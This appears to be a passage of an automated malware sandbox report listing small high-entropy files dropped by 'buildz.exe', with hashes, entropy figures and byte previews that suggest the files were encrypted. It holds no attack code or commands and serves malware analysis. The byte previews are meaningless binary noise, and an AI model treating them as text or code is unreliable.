                        Size (bytes):824
                        Entropy (8bit):7.7379978962296985
                        Encrypted:false
                        SSDEEP:24:2Z8Dn0s4VIaJFTu31MUoTNOFMc2O8t9oyfJfGbD:2M0ZIaJFKMUKNOYO8ppUD
                        MD5:DF13104D8CCFBB4440F97DBD5819D1A4
                        SHA1:C1AE3F3925F5E27B09F418326ACFAC465DE2823C
                        SHA-256:F789020CBD02BD3F9B272DF6799F13AFC94472C3D17155C4CA58B607E3B1BEF6
                        SHA-512:B2B0EB5864AE3A0AACC977B4DD28838065797CD5C26E8E1690AE1EA64F83CFD52BAB81D75D6212AEE5106CCEB7AAB61ACEEF24700F3F143DDB6FFD4A39F5B915
                        Malicious:false
                        Preview:<?xml..u}.....>...|.i.5@...YK....E.....U1.I..#s.../..\.O..K.&@.;..S.'$2...2.b.~....K.!.E.?4.C8{.D..Y...P7.....s....>q..J....Z`.$.v.K.P.c.&W...@.-.m..[dI....:xY/g.KNvi.)......2...fA..C..w.~...:.......p.aV$...,.hl.....M...%.:.W...X...!C.cg...9.......2....Aw.jc[.t...#6\..|G/...]...;z......].'......=..de.t..0..=...._..b...H.t.%...(.J:..F=N..|g.L.B.f.....x........WA...z.....y...+."g............2.T..!x...O..3.@.r.Fb.....+.l....|4X...K......t..>..l.dy#|M..C]/.d..1..J.V.-.,).L...k...DoNM.lQ&...[.R.q..v...3..A..?l...W..s3.".v.U.(up...5.b5.'..2...h#G..+..#.Kn.+..m..../.Ry....*hp.N...&%B@...T.........(.c..4.8.(F*,.,...!..>^b.:..~3.w...wG ..y......?....A....>..6f.4...\..4.U.U.?.Y..K.c.|h0I\..^..V..C?..p..x.._.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):749
                        Entropy (8bit):7.692322724638177
                        Encrypted:false
                        SSDEEP:12:bFWJ2QGhq4N5/ryewvncsa8BNvjhuEtaVS+JPJ2uDIO26Gcii9a:buGhqY0vncVEwxlDIcGbD
                        MD5:D7BB7A04EF406D225F9D27B6B7D1333C
                        SHA1:6E82106F8DD8FB3D40B49521722949B7E96AFC75
                        SHA-256:60F7D47032A36922F347A426B0E7F0DE08143CF5E7449ADE6314E227E57FBDBB
                        SHA-512:84218669D2406014D6A6C6A2C383ACFC57A6A112EF05462AD3B766A98D0FCF5370DA9A02E31523F805A40BE67179CDA312258F0619BFBCBA87C992ACB34C26ED
                        Malicious:false
                        Preview:<?xml....K[...Z..i#.....]....r.!]..3....o..lL.O.]!.L4.......2.Y..Q.."...#......;..f4.6..,]P...qz.M.9+L......R.0.j....Y.....W..NO..r.../q(XXm$Q..p.o.B._.~N..1(9..$%.#......,...Z.g|...."........hTCJr.!.'n5.=...zC..i.U.....D.....=D..'...^..:4$/....T.g.:....._0..H.Xe.M...d.*..R....M.J...<.a..)..o...]....V..M.'C...OFH.%$......O0. W~....0N.R.w..........=V.Cp.K..n...>!8..S..~..!,`......VeHg....!....{$.......(lt......AL..4.*..,"...?...O. ._........^.k0DS%.....5...3*......M*.B.r..lqMU}/.C...W..[.R5.g..H=i...p........ .>.&.6....d.....-...6..~.k........l..&........5.e_......~..)&..+'.).....2@..)X.F>....._..C...F...D~w....4.}\..z.>..d...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):812
                        Entropy (8bit):7.726566734831448
                        Encrypted:false
                        SSDEEP:24:vryHD8vn9QSfHHAYBPhnTgtiHuhK0yNOGbD:vWj8vnCglhncgHt0yNOUD
                        MD5:365434469CE670A4A96F3B9E796D05E0
                        SHA1:85762173ABFF60DB1636E05FFDC26FF75AD3AB8C
                        SHA-256:42C7320BC4B8DF050D919B331A4869AA1D74889478B96FA70F6FB9D88B25F800
                        SHA-512:642E250811B43E375A22ACE6FA995A916CB6BBF9756BD0BC5C3AC0E94855F47B3F2F91F1AB93277799E543A025D7A2F5D8CE6B4F13E2A70B5E3520E93D7FAF6F
                        Malicious:false
                        Preview:<?xml.j.Z..l..........G.;...\..j.Bd..3.B.....1...]Ac.W`...d}'...~..|.%vn...e.JhU...0.....iC..nN.c..!;."...vpb....`...n...%.....U....V...+..E$..UUX....Bhw..y.....f`.]..)g{H.J..7..`!....e.......b...l.;..!....>ZC.y........O....\N..t.......U.X.;....z^..=....P...E.:.Q.L.j....(.6j.X..U......``....P..i....u](6......P...7c'..T..........O.k5.,".p.r..ecw..KR.~h..."A|.J7.`S._.!{GEoYB.Q...V....BY..2.:..9.P..R...|......"...;O.e..y.....wW.OlV.D. .L.3..>Q"...ea0f.c...j.3S.4T........d&...)H.....M.K....T~..*hr...0C...u.c\.W..QzgN..,.H.....0...&".h.A..8.)AE..66%........`.o.~>,....I!.q.{...Vj.\..O7@.(..|. .....40..`.?7..g-.........*.0....Z(..`.4. .....b...T....*K..._.).WX.."..I......bCu..k.}..B}.............x!:H.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):748
                        Entropy (8bit):7.6601263432304725
                        Encrypted:false
                        SSDEEP:12:jOEsyluiykw7Vw3Qz8eh8ILgL5HHeZ2UoIecTL9J1/26Gcii9a:jzsylz3wRGIsL5nIWIpn9JRGbD
                        MD5:03C820A0FE4C7054EC09D90E1DF6AEEF
                        SHA1:0666910D64EA8D3924ED0520A58BB0177D32B737
                        SHA-256:FEE42FB0480CEB76FB626A047749433AFD7D6A7BED4014349EB021E424FDD9AD
                        SHA-512:C0FBC0A569DA4394873EEA0EE16C2F5773017F85AB164AF02C4B1FEAC5DB7937000A65B0663A2CEA7CA509582641BC4BDC37B8B2483137397EC9A4852CED3B0C
                        Malicious:false
                        Preview:<?xml........1.k._{<<|.....%.v......4.y&*R|iG.M.K.._k.. 6{.H....@oZ>...].>.,..#.......E.o.d....B)....4AH....w../......M.R.HR.eTrA..p.....!.I....xRP.g.O@..31Y.eq....wx.+.@.......m.|.......N...3.G.~.1M.p...9.."..[....hJ...<."Aor....M\.1.*E.8.......u.).....9..<..6kL.Z...!XZ.....W.h....obc.!.Z^[.w.XZ...4|.\....s.p.%lyzv.m.H..L..}.a)Cxq9...TzK.....C..\.aS0.Le.F.A|.<M6R).. ..T.x..)..\...:*.8.;...#I..z.iO.l/.....[&.....F.....i...Mv.{.C..K.F...'......[4I.W{iv....@.....l..D...[..........-.o.F.!pt)B?.B.do!..dGc....Vo.t....w....H..g.-.<.{.{K...JOc.LM..x^.s...t~.3Xv...@P./.S+2T.........*f,!`.=....f......SZjH)<.OGn..........R.....<..%.....\....d.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):804
                        Entropy (8bit):7.6996223250782965
                        Encrypted:false
                        SSDEEP:12:Bp57n7bDc9njcpxBSyQG+1mPBRo8NDRg0HQojqtg6RSyRefu1Q1p54RbabS26Gcq:l7n7YkxnOsnb6k6td4yRwu1Q1D4RVGbD
                        MD5:3A00F706A39DF11B94CA50D7E3C90F07
                        SHA1:02C45C50A9220768E42BF0148C4C17788486C814
                        SHA-256:5162AF63CB7EE9A8645F1183F610E360B2BA41A39D5410D305601CFF8642CCA6
                        SHA-512:CEA92D6B53607A996540874FE63255A1A59EE3CDD10C09F52C4E945394A465B9148368843469A5EE9A87730C56062F5CC73045A26AE3E534F9F5DCBE920B01A2
                        Malicious:false
                        Preview:<?xmlN..i....KMR9..m/.o.....q*$l.W5...d;...Y=...R3._x.SF..m..:.1iz.~>.oJ."yR..Y9..^JX.4..!..Y..z.gyD..|..+..-%....3*.9g3.~...c.?g....5@l|...L......HSg,..c.......%...m< [.)[+...p.g.J..../..S.4...\..FjL......h.4...e.8... ..yzh..EL....T.-...L.....8.z..w....\.<....4...U.O......T...A-...d9...U....N...c.9lP....p.!.A../....g....2..}.119..9....Kl7u..;...goj<.9.S....W^.+l.,m..k..{....~v-...J}.....n. .......^..;F.9....@..}}..Q..S..k{....6.^....5..j....G..iS.P.hs[...>....._o..c.F.!..6..eV}M.....)&..%...#.xA....I.._iNe...H#...+.....(...@.i.7.7H|.]X?.u9...ri..K..w.f.r.1..4..lZI-r......l-. .$.f.0n..g.T.L.-...WP*)v8.2H...AV#Y...0..h.r8t".`......-....o.P.d.e..jt.........a.....OIP.<..i}...Vn...c1....%QEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):752
                        Entropy (8bit):7.673250588808034
                        Encrypted:false
                        SSDEEP:12:sZdC+vhFaHdFYdvd+VCw2pHiDf74+Gjpd5EZJR+4GniAgRtF02Tw1cAHNztH26GX:a/y0KTGjpd5kJggtO2qzZGbD
                        MD5:2A1A5023769731EB8B7AFC8ABDFBF617
                        SHA1:D092A8A55092FB1803692B1FFC37EFAD7DCD81F8
                        SHA-256:EB14CFC0515242E2535960746F955BA89FFD523B6CFA923657D3267BC51147E0
                        SHA-512:D0143BD34D1D5AEBAF36D239B5DC7C6F5508274E13F487B2F9F508E4584E336B91FCCED331414310A4D7E3C7DBEC9824160D0DFE7C39F32F4276B50434DAE509
                        Malicious:false
                        Preview:<?xml.)..j...tS.'s...*..#.p......,(..%.j...r%.Q.u...k..'..((#.F...r`R@l.8........""."..4....k..t!A(.s.../.h...I.....p.7..x..S..r...Y...P...D..-q.Z...b..E--.N7.}.T.|..&.K.t*..c..........YN..\.c..FD..]..4T.-..:.....a..B:...W..g.).....&.....VQ..w....#..S.z....(.qA..Q.5<.]S.q.Xc;..7....=..S..j..j...&..a..#..q.....&....Z...j.:.d..|iZR.f-uU.*........D...Op}...0sp..h..R....4B..C...../..g.^.J.S...;.....$.0....S.*...9....N...<N.....<.n0..v@..s.....SE..h/.S%..D....h"hzC....+.-.....9).KMz.../@..^...f"...0..X.mM..o....Wh8-.<.D.fM..._J....[........<.....!./.2PR.{.F..9..._.=.....h..!.B,....J...#..]A.4....2....;.^._.+....Eu....."..u...yo'V.f.....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):810
                        Entropy (8bit):7.69151683764153
                        Encrypted:false
                        SSDEEP:24:J1lg8UiR/KlE+O+LxWrmyHTAhgjPiFRAkjVGbD:tUitKevgxWNzmg+RASUD
                        MD5:F198A208F768B11D35677376727EE1CD
                        SHA1:A9545D6CE83036BA68FA06EEA6C993102D52E1CD
                        SHA-256:DF7025F31131CCEC36BBE39BC40E2E875478F44002B73E5AA36FA36DB0319898
                        SHA-512:A1A4A309946BE6939DFBEE4F6B3BFA033BB2B992CA606FDF506186E52AA0632F86AF7A5FEC70EB46B0A32CE73990C4E9B378517682EAC8150B812927BE498575
                        Malicious:false
                        Preview:<?xml.....a..oX(f....v4...].<.R...G&..]...C^...C.@J....dJ:/.J.4...o...T=....{P..........(.h(......vB..LB.. .D.a!..S...R....c.".jz...~...^..+../.x9..`....'S.?T..z$.D...."..R.!.(E..'S..~.!..lA*Z..>.c..Y...=...I..n...?fP...C....K.....!..|.K..7...l...>...../...c..O..........F.....R..D..c/m....H6.h.F9..i4O..r...|.TO.G...X3..<.&....&.YwCDu..C.Je.f..?..kJ>../.N.....~.........B..q$.Cx..{.$Pt....TH`d..w.?..U.b.O..........Th[S..........^.<...RCr....W..s.....B.Gd...m6...s5.....h)f..A..!..O.o.#..J4.$B.<.Ee2.;=......s..'G...X ...&?.\."-n&u2j.....DR...4*'... .........{EK.X....!..V.K@...&...].....Y1.[x...I...Pcq|.}.G..2.G..\....K..Hw..7.3YH<.<.....p/.yK=.)3o..K....A.-..`n.O.....~...S...K$/...-...F.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):752
                        Entropy (8bit):7.679530552214693
                        Encrypted:false
                        SSDEEP:12:GAVPDzoT93OCVKsvgxw6yX2OvtzErilK7+egnuFlEY0UJDck7hVsYErfm0RbCNfK:GAVbzO93NVKlJOvtz8h+egnuFyY0UJHC
                        MD5:5AE1B6F1B39C86509EC15776E20C1B5E
                        SHA1:10CD59E6F07694AA11F62613B0010CC85868A300
                        SHA-256:04DE56773A949FD7ABE0758BE212754DCD21BD5DAADC90CE8D0A054C00957D84
                        SHA-512:2BC7D8A034340B6247F19754496A1E6A155E521BAA3E39422B43DF89668B4DB5C6F805C5475D11E9F2DC8942D26493A7526E1134C4AF2069AB2B6F0C2D56F266
                        Malicious:false
                        Preview:<?xml......3p...=?....\4..........j. a%.I5....k....6Z\...(..:...Nf..zv.].9..1..a...f....`V.x.p.@Vf.V........*....V.....;.N.....l.U.;NaE..=....GE.G.o.|..E1y.D...........^>.>..X.U.nZ$..w....hx.|..-.(3......y.....S.p.=+EQ...D.:d.....F.4..._....4....1O...,3J.3...8.7..#.?..g.=s.{.v.M".q......I-..&.......5."kG.zA...&..o.h.....\..fl........3/y.........tu.(`..E.!.......4.#+...2..n/.^.-.O}....F..(.Cm..0....*..R.....;.A>.tJ...v.....IX..[...C.Z.:.((.;...(5*-.vX.......%]..RE+eT.2B..j.5].....?..K..<.. 0....v....77..6.~....Lq.w.e..K.'.R;b..j5.....&6.O.....L]......[..............!.\x.f.CG^..=..3[.........>d.2..1.3..o...p.....E.6....v......kqb.!.x.U...VEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):810
                        Entropy (8bit):7.732601422059438
                        Encrypted:false
                        SSDEEP:12:5XcQ9hdIDlp9UpHOElo4nA7d3M1TIHLpil6boPONO/0P7R3/ItNh/DgUuAw7BS2b:qQ9hu2ZdAMTIHdsmQXh7FuARGbD
                        MD5:A4F7C3107024034C30608407D5C29F04
                        SHA1:525401401AF05A65FE6213933080E1239778FC59
                        SHA-256:65BF327BFA81CA2D7F707CB63B546A6DD13BAA7214EA34DB61F7AE5C961B9DCF
                        SHA-512:EE4890CDB12E3D67330045B3679EEEB428BFEB656B2849DC3AF1BADD90EC95FB2A13AA9219F5C101E51E6EB8D06282F9E106ECDD4B768ACD9F6827AE6E54B042
                        Malicious:false
                        Preview:<?xml.M0.be..{.....%... .W.[u..}......@..Pz..ErX.7.o.[.N.LJ.]z.....Fg.X..O.Yz.N.(~Dp....tq.....M.&!;#....\..+$....N.8....f..)....R....8I...aG`.j...{.......2.GN.....Z............,.....y..a......vN.."...v.. .k(T...IY....^r0.2.va..RG(....r..6.n.qO.....g.w0A...H...]...Z...P.NO..W...\....v.M.2.+.... `...3..Y.....*J.H.....Wu.^.=....wDK..l...i...t...E.~.=....1.N>..z..Z./...z].]..!.. .U...zc..1j.)......, hl.,E..:.?o..Z.?....-;..th...j....t..k&......"...E;.......J...^I]..5..^.d.b.......{7..6K.9#X.@..........gfl.....h].[1......<....9t....e....>elv.c..e........e..}j.iG".....;(...J...v06..6....+u..(...#.!n|.L..8)[.b+...}?'.)Y+....%.9....^.-Z)Gy..c)>W..6....y...|$.....Z.JAW..w......Th.Y*.V..{..P.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):752
                        Entropy (8bit):7.67189188895776
                        Encrypted:false
                        SSDEEP:12:gvU8jYqldxro7SR41vW9w2gWXhEmsu8a2jRYL4eNGImKsgkPczjgua26Gcii9a:bUlz8261vvghEvRYL4FjgOuguoGbD
                        MD5:0429B95C54A9320F1EC073C20DA09EA1
                        SHA1:DD445FA07DD77CD2D9F1871746B6726E0923B2A8
                        SHA-256:2D0D732605B1E9AE0DD458FD036B8084608CB74054E07780D5FB64EBE5E0D5FE
                        SHA-512:3788E966A7C7FE431AE24664217513D4EE819FC1CA45D173494A98A3F8F19F57E6DECA95E07BEF782071ED22E649E294FF3A9CCF6172D2B10608A212716C9D8D
                        Malicious:false
                        Preview:<?xml...T...x.S2.^.....P-l...L..d........h...FK0B~.Vn..._.M.I.....%(..a...p..a[.....Y.74.E....=..K..X....u.hS.a..P..,..Kq\...4...-..r_.....).V. ....c.3d.;....7....$z;....8...L..<7.F.1.....<....h...c....4.y...eD..Er........l..s9wKC....E&^....?....z.VpUg.....P..9..5.M.m..r..`.....^.?..n.?...;....f.4.x%....(.H~...j....m.....H..4@.g. `....R...b....Q..J..cDi.l.}s.v.b...:.....^y. ...>...6...a..B...hy..z.2q[ .....@........p)=.r.......@..#k.Fs.....W..(}...6..Z......-.....g>6..2GN......".......j....).[Vn.UY..<l..v1.,P.I.........$X?.E.x.3#D.........;,...7.=....J.Z.....+/n...s..tn..o0D.<..H.-...hZ.0..7...[0.....N.j.;b...rV=.R.B!U..5..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):805
                        Entropy (8bit):7.729888315618153
                        Encrypted:false
                        SSDEEP:12:sV39Fa2HLJ8tHGtyc3jOZBbeQ7vySL5mKkjxbALyxA/wOlZcy3PfW8sAqYnN53II:mNFa2t8VBbeQDXMKkjxbCvcy5WGbD
                        MD5:2FEBC9E90362E47A6E227CBD380B40B5
                        SHA1:37AB6BD0EAE46EEA29ABD35106D6127DAD901AAA
                        SHA-256:99049A5192346E417BAF80AB80E98DF5D237D7FC72E9D178617473056DF9CF57
                        SHA-512:6135AE1F6495B9D91DEB0527F2EFBE2120D489CE10023B089123910AF758D7BD66101DAD6F4FC076266F34D5D36C6C8C136894844FF5BA8D6E1468C90D2D43F0
                        Malicious:false
                        Preview:<?xml.Fr..6... ....M.Y....@.X.~..!6/.\...Nh..0.....>.*Y./..[p..N#....;v\.W8],].=.`\.).s."a2'.....e2gz...Ki..9/I...L.:..q#,.O...l..k.....y2x.+..Q.}.]pL+]....`...F.R?)n.?...Z........."...T..2..H)..6.@......,..).Q.-..n..:~.....q..~..C..._.|.....m......io.d.....u.+d.D.*..|..=.p.........9...r......5..[.../...Ox...B....Vgh.:.....]`FKHB+..`.'H.#$.3G.!.r)...- o..bg..u8.35.4Z~......4!G....~.H.#..i.*......[..97v....mk..3.)~E..".<n....7:.=.U.Q..A%Q..weiW.)......U/Pm...TR.......zA.Y.TP.:Z..v.6....n..!...!.bN.o|z'.+.n...H.......Q.....f.Y[....$.wxm2u.Tq......M...T..0....W.2fFh...).E...M.eQ....k.|q.....`..P`..C.9|H..#.i...%......5\.Q.g...'......1X.&;lK.-t...U&.gX..a.d,....>.#;v.......]|.e.d..Dtt..,;d~..Jy.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):801
                        Entropy (8bit):7.717905107224637
                        Encrypted:false
                        SSDEEP:12:JSH7LB6esI9ElZxXgjxqvRn+Z/jLQ8DVdsPlSuMq4NG60JqSSK526Gcii9a:MZ6/iqvV+NjTDrsPgel60JqShGbD
                        MD5:D004FF1D023AA956BDAC5AD3B566DA39
                        SHA1:7D6BB62308525951932728284D07EE3125A6B9BE
                        SHA-256:044BAD07B9697A68B23080865DDFCEDBE13D945C845921BADD6291909043F5B3
                        SHA-512:BF0DEFE52E6DE164CCEF7C577FC2BB391F01DEB44D9A9AA7CE227E993E9F5CFF203E2C8A63D023DB30CF4DD750C9DA03EA9B1CDD347C4B6948D19F6656D14668
                        Malicious:false
                        Preview:<?xml..|<..c............n...C...e......' .V.6.R..b$u.Y.......s..z.........A#.2.\]D.,.WX.#\.R2.<z....|#4......6.....g;.NK.e.0...d_t<2..>. P..qS......#.P...i.C........)..N.*.w.}1....8.d...|...%..5..x......$.E..^.....J....2.7al.w...........[....<.5..+A.[.0......dI..h=....2.N....-.....k.`...l6..5...o....b1F.4..[.w.Q.)...../....c.A.....|...>x...T|t.4+ ..=k...o.Q..g....:4~!g..0.e..}4.&,.;....k$".U.k...q.e.............{.D..i......9.i-f2..!2Tdt.t.......z:N.k.....d).z...D..Xltb...N".NPW0@....<....4R.R.v.....#^...J.p......5f.w....N&@#..Wq.<..).}m[.si..#......8..#.<,.xXB.J.a.;4..]u|.........{..._W.?.>.~=......w...tB..#...N....g%....%z.Tr>.X%-...Is....i|....u..=}.....9.......\M.....3....f..X.s?...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):818
                        Entropy (8bit):7.714778481673554
                        Encrypted:false
                        SSDEEP:24:pV0nbR4vP9FymvpElhqF8BEavy+9gJGPoQ5HGcvw5EGbD:8bRUFym2l+kEIR9gJGANcvw5EUD
                        MD5:4FF9ECFE227DB6FF5BAAC1739D691848
                        SHA1:64D5683F84F9F5909CEE60BADA22CE6D352B0C6B
                        SHA-256:71D351522A9A77B00EF9B02C1E6FC426DBA33A9FC53CD909202FB5C0730226AE
                        SHA-512:802EFB7D2D659E80056003A78A2999CE1F61A152C6774BCDF045FB13D7E6C9802A6977CE9B73951B50C7F24979B193F4F0ACB922EB7740BE2AB20ED146384051
                        Malicious:false
                        Preview:<?xml...Y......%...mL...k..a...K.|yg.n8....(<.!SP9,....G.9.,..SG.0....01.QWD......EH..t.a)..H.pO\....C.H.b........VC........}..51.|!......o...Nf.....6...43.....U..V.X..Q....1..6..a.f....0..c.,...2r...Z.IeL.j.o._u9)..@..I.e...x.4...C.d.o\.K.~.q;..!.z.......8.`...m..v.>..TlQ..2....Ry$n<.,...3..5.)..Q....U.*..>AA_Q...~..V}.m...jzhP..n..vd....l*.....w..)B..ex'..K\0.'V......V.^D...a..{..D...+.#i.I.....l.d..i..z...8T.KU..|!.]sG.*...v&~..Dg. ......AX0.).jy<........H.........4.r.k.}8....+B.~.,...DAw:...sK.@F_I2T.....8....w..PQ..C....6.v.....l.3...0i..KCiV.....I..d....B...F....t......2..H*k.yOSa./&..mw.!2n...a..,qJ../.>..22..>j.z6.......2_..+b*.2d....oc.7..{*'...&y..7...&.<..O-*7s.z..n./...G ..,.'.FEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):744
                        Entropy (8bit):7.639406102295756
                        Encrypted:false
                        SSDEEP:12:KhVqbA8adgsAboeQ5YR+/3lQwP6rJ6h7v0ued/08Qt8nSzf1/26Gcii9a:ISA8O6b/Qf/3HCrJg7vVed8Hg8HGbD
                        MD5:BC27CE478D60BE0B7DF3D3DE522F5738
                        SHA1:A579D96A6A0441358D451FE74B08F33F485EA676
                        SHA-256:2082ED10D6DFC55E03A7924A4F2265AFDD138F1358C9E00C67D341AD02BF4AD6
                        SHA-512:92355DD02FE1A178B6F73D6145EBC5EBA59D95E80A3B97D4C8AA65961DA993A178354AA1E202DD9DB947D17279ED448E5475EE78075735B3BB83230947263CA1
                        Malicious:false
                        Preview:<?xml....&VH.)w.....j.....N...\.6.lt......7....T..}.9Ht....Y...I...3...x...|.(.F.M....o.{9....pC..O...<DI..-.~.t.U..5.VI...c.....+l..c.O..Ay.8....8.8uR....>..w.O8`'N...q-5..o..-.~.s........ r..*q...3.*...*..V.#s.......!..U.Kx...YF?`.5....r.N.............Yp.....T.+`.../....W.w..Cs.....G..'.G0W\q....p.UW......lx6.Y>il.E..U..$..h.@.gF....Hh...e.|....q*.9..C[.E....d... ..Y..<......U..a...\...5.4.r..+.VXv..M01.r...E...........I.i....)l..4;?.Q..L..}.vM..s...S)....k....q.'.ca....'B..PK^}.......U.T.....4?...o.......]......?.J...i.,.}B0.f-.&b..w..U2N{...'..E...G....sUd3._R...}i.m.\....g(.k.2.[..6.a(e.".8......|...Aa...xLu=.L....D..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):803
                        Entropy (8bit):7.703694865140985
                        Encrypted:false
                        SSDEEP:12:dRJixlqaZrC4iI9sI8Y3ocyRfRY9d1YKRrv3KctcqKXE920lCPVe1rd9r0GjwgpI:dctZr5excyR5YmKNvOJUUpPord+8GbD
                        MD5:8BE2C08756754E9E21DA279FF148FC99
                        SHA1:D1B14484346E9AC53498C5C421481BBDC06EB806
                        SHA-256:27FDB3C2970671156F090F7F0BACD5643DEE4CA90314B0986B69F902AA063844
                        SHA-512:223D4277DB6CB9508A06665AA602CB38D74E6BC2FDE425D2BFC227E5D2BE835B2B5B1A05CEEE5CE636A534742FC46810F5AAD2D56ED5755FC4DF930C1E719C21
                        Malicious:false
                        Preview:<?xml..t.2...L.M2....b3....EXg"....nj..9..b.._s..$uMz.v..:w.......%.?r....+*..l!|tY..C}..N.i..n..C.P+.l....|.&S...qn..'..M.4....m...6..xW..q..l$.-..T..T'&W...(..m.M......N.Jo.o.1.).A ...<....v..V.`.?....U..H...i`I..... ~.o.7.}.:^....k[...q...W..=C`.........v..G/.K.F.......i..f.tX..`.H4..;.rEev..I......\?t!.o;..{{ex.I....b.....W......z..sG......e.F.v..~..NV..l..b..`L.D..\.\v.,..Y.4..ceX.'...=..~...H....rwe..B.K...\....8..$.L.M.0.yo.u.\r`..s.w.=hI._~.?.G~')z....O..(......p..T....8...........L.6...{..!..Cog.=p....s..8...........,..T...c.hs.....E....p.."....x..M....!..g.J...@...z3.&....e.N..J7.....+.N.."A..@.X....~r.Hy~. ...&."..CG^.o......^.j+.t..>9..T....b.t.&......r.:..F.-e.#..'..z.`.N.;TEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):760
                        Entropy (8bit):7.76190614594955
                        Encrypted:false
                        SSDEEP:12:gN/P5lsAc6B85WxV65QnhYtdfPP5INl8F7KX5x4M90vOiw+Jevf9S+aN6jpckioI:gN37fbeW3hYDfPRIkhAp9DCilmipDhGX
                        MD5:4594298C5E3AA223EDFBD215AB3A72B2
                        SHA1:9856E11F6817A9A1EE400110BAE99309B251F1D6
                        SHA-256:EF6EABCBB56F193D39D0DD5A165AC059C3F01E360EEC0BB51BF53EC67BC9EF73
                        SHA-512:C86F051FA460E8AC413A36D8FE9A38501256E44DB26D596C70D982F90A023628D58D317111A10A53A1EB97703778123D2620868166DC08F18016D8F1A8135DAB
                        Malicious:false
                        Preview:<?xml].+~..y..cm.Q...Q.nU.t.0... #..,...A88n....M.u.a.wi......I...q..Mi...9.E..&....sO.._a.K.P..MsQ..._...en....r.(.....t.{..K...7......^... .........7+..._.j...DC.OK[qP...,.OA.G..t....Q.^[.......w.#...9.d...u...M...WB.:.......>l..b...H.H..k.....TS..c.L.H...7pG..`.`P.rC.....q.%..\..W.1....:(.6j.{5..Zr...&%x!.=#.........!..M*._...m.%B...2.S......Y[.).L..k..2..?....P.x.O.wC^Y6....IV..+.;.`.....]F>.......4........:t2.l..i.-..fu.[.Z...9...%.6.g3..H~. .YW.!...|N......_5.k..9m_..........(.=.J.<F."%........<3....>.b..pz:UE'._nV..z.C.do..$..."..D........Nz...'...#g=...!.@I....~.t:..S...fY+{F.}..a.#X..AV.hI]."C.....#t.....|.7..l.v.[.1......e......+..PEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):835
                        Entropy (8bit):7.749230060437494
                        Encrypted:false
                        SSDEEP:24:mxyUpQlAEtrJQSiTUZ1p3+0kwRdtdkMaNWfqj1HGbD:OyUgRFJQSioHZwNWuHUD
                        MD5:FEA3A2D33E97D4496E43217C77D8AFC9
                        SHA1:7A059D632EACA9A1D3DE01D605827D2A7D48CF38
                        SHA-256:2962640B0E6D6EC85F8F0197A143A537E3B97D02D95DD09F2BC06B1B800A1FEB
                        SHA-512:7E713EE6510D367CD77B139EF1CBA5C6A1A23165ECE0F905849092B2346EEA06C855C2C3E7C96381469C43F11A161E73BCF0359E665EA5322BE5FD6DB733A7D1
                        Malicious:false
